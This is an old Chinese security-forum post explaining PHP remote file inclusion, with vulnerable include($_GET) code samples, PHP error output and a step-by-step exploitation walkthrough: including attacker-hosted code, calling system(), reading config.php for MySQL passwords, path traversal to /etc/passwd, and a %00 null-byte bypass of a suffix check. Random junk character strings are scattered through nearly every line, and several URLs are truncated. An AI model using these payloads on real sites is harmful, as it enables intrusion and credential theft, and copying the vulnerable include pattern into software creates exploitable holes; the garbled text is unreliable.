中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含

7 e1 b0 d' [0 W- iphp远端档包含漏洞基本" I+ r1 y" n9 O8 i
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。3 L' ]) b9 i7 \6 \9 j
本帖隐藏的内容需要回复才可以浏览
2 k  P  z9 k1 W$ P% w$ R首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。; Q% |! X) s0 W! c' B
1.找出bug:
0 A5 n0 n9 Q9 `, h$ Z为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
+ P! i9 T+ G$ _, l1 S如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。" @$ `+ k6 X/ t* ~: ?2 B5 O" V6 ^
我们先看这个,当用户输入通过后就包含档,也就是
$ Q. e: v# z' D& xif ($_GET) {
/ R3 Z; y& o/ {; {include $_GET;4 H: @) ^( X- j2 @
} else {8 V2 ^1 Y# l' g7 z" M
include "home.php";! c: K' z  ]+ K) }  _1 y
}
& F$ j& M) M2 j% o这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。( ^) F2 g) f2 F# j
2.测试  x; b2 E9 b8 i& R* Z6 f
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
" }- F; q6 z. Z1 }, vhttp://www.target.com/explame.php?page=zizzy1 R4 z* E0 u) M' c
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
2 V& [8 u$ C4 E% G$ F/ |+ j& iWarning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
* o/ Z, x0 N/ i, l; i  g0 l9 Zphp输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
6 F# X- F4 d6 `% L4 q( _) j% `3.利用/ q( e! @+ M8 S$ k
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样+ n- t+ N( S8 Q- f0 ]9 w
<?  R+ B' `/ K  R- I
echo "Wow,test!";
* f  W$ g5 K( ]/ ?' Y# R) B" v?>
6 M4 x( m4 H1 L7 D1 b. W那么http://www.target.com/explame.php?pa...e.com/yeah.txt
. U3 o& `3 B2 J# X0 b9 {OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。! B# c! ~  i! d# j
4.另一种3 ]6 t# ?+ q8 O0 W1 M7 C
有时程式师换种写法,写成这样,限制了包含范围4 V+ I8 \' ?& R9 G+ }5 F& x% g. c
if ($_GET) {
6 h* a8 k. ~. k1 T" Tinclude "$_GET.php";! o. c. j& {: q
} else {
; V, J" R6 {. X* J4 d9 O/ g# Winclude "home.php";
& m! a8 ]: X$ e5 @}3 b0 v$ R7 d% W2 {% \0 Y
我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt
" d4 C* G7 z  h+ g  cWarning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
+ w: @. t' ~; IWarning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
: U) i3 A2 C6 k3 J4 s/ S* a包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
3 r) q* m7 X) v. n那passwd怎么办
6 x2 r0 K- |# N1 v3 JWarning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
: j# c, q- \, p/ q0 VWarning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3* Q0 {5 @3 b3 E+ H- [
在这里使用个NUL字元,也就是%00来跳过检测
  ?+ C4 v' E) A( Z" s1 g& [$ L# Nhttp://www.target.com/explame.php?pa.../etc/passwd%00 1 B' X' K+ Q$ c8 k+ e




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2